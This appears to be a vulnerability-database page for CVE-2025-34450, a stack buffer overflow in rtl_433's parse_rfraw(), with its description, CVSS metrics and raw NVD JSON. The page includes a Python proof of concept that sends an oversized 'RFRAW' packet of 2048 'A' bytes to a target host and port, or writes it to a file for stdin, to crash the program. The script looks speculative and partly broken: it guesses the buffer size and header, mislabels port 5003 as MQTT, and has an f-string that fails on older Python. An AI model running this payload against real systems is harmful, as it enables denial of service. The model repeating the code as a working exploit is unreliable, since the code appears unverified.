Security Vulnerability Report
中文
CVE-2025-34450 CVSS 7.8 HIGH

CVE-2025-34450

Published: 2025-12-18 22:15:56
Last Modified: 2025-12-31 17:45:04
Source: [email protected]

Description

merbanan/rtl_433 versions up to and including 25.02 and prior to commit 25e47f8 contain a stack-based buffer overflow vulnerability in the function parse_rfraw() located in src/rfraw.c. When processing crafted or excessively large raw RF input data, the application may write beyond the bounds of a stack buffer, resulting in memory corruption or a crash. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rtl_433_project:rtl_433:*:*:*:*:*:*:*:* - VULNERABLE
rtl_433 <= 25.02
rtl_433 < commit 25e47f8
merbanan/rtl_433 (所有版本至漏洞修复前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-34450 PoC - rtl_433 parse_rfraw() Stack Buffer Overflow This PoC demonstrates sending an oversized RF raw packet that could trigger the buffer overflow in parse_rfraw() function. Note: This is for educational and testing purposes only. """ import socket import struct import sys def create_malicious_rfraw_packet(): """ Create a malicious RFRAW packet that exceeds buffer bounds. The parse_rfraw() function in src/rfraw.c doesn't properly validate input length against the stack buffer size. """ # RFRAW protocol header header = b'RFRAW\x00' # Create oversized payload (> typical buffer size of 256-512 bytes) # This will overflow the stack buffer in parse_rfraw() overflow_size = 2048 # Significantly larger than expected buffer overflow_payload = b'A' * overflow_size # Construct the malicious packet packet = header + overflow_payload return packet def send_malicious_packet(target_host='127.0.0.1', target_port=5003): """ Send the malicious RFRAW packet to rtl_433 server. Default port for rtl_433 is typically 5003 (MQTT) or uses file input. """ try: packet = create_malicious_rfraw_packet() print(f"[*] Sending malicious RFRAW packet ({len(packet)} bytes)") print(f"[*] Overflow payload size: {len(packet) - len(b'RFRAW\x00')} bytes") # Try to connect to rtl_433 if running as server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_host, target_port)) sock.send(packet) print("[+] Malicious packet sent successfully") sock.close() except Exception as e: print(f"[!] Error: {e}") print("[*] Note: rtl_433 may also accept input via file or named pipe") def create_malicious_input_file(filename='malicious_rfraw.txt'): """ Create a file that can be fed to rtl_433 via stdin or file input. """ packet = create_malicious_rfraw_packet() with open(filename, 'wb') as f: f.write(packet) print(f"[*] Created malicious input file: {filename}") print(f"[*] Usage: rtl_433 < {filename}") if __name__ == '__main__': print("="*60) print("CVE-2025-34450 PoC - rtl_433 Stack Buffer Overflow") print("="*60) if len(sys.argv) > 1 and sys.argv[1] == '--file': create_malicious_input_file() else: target = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1' port = int(sys.argv[2]) if len(sys.argv) > 2 else 5003 send_malicious_packet(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34450", "sourceIdentifier": "[email protected]", "published": "2025-12-18T22:15:56.163", "lastModified": "2025-12-31T17:45:03.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "merbanan/rtl_433 versions up to and including 25.02 and prior to commit 25e47f8 contain a stack-based buffer overflow vulnerability in the function parse_rfraw() located in src/rfraw.c. When processing crafted or excessively large raw RF input data, the application may write beyond the bounds of a stack buffer, resulting in memory corruption or a crash. This vulnerability can be exploited to cause a denial of service and, under certain conditions, may be leveraged for further exploitation depending on the execution environment and available mitigations."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rtl_433_project:rtl_433:*:*:*:*:*:*:*:*", "versionEndIncluding": "25.02", "matchCriteriaId": "C1734A7D-1DD8-4764-88B1-3972F46DA576"}]}]}], "references": [{"url": "https://github.com/dd32/rtl_433/commit/25e47f8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/merbanan/rtl_433/issues/3375", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://www.vulncheck.com/advisories/merbanan-rtl-433-stack-based-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-004-rtl_433-rfraw-parse-overflow.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.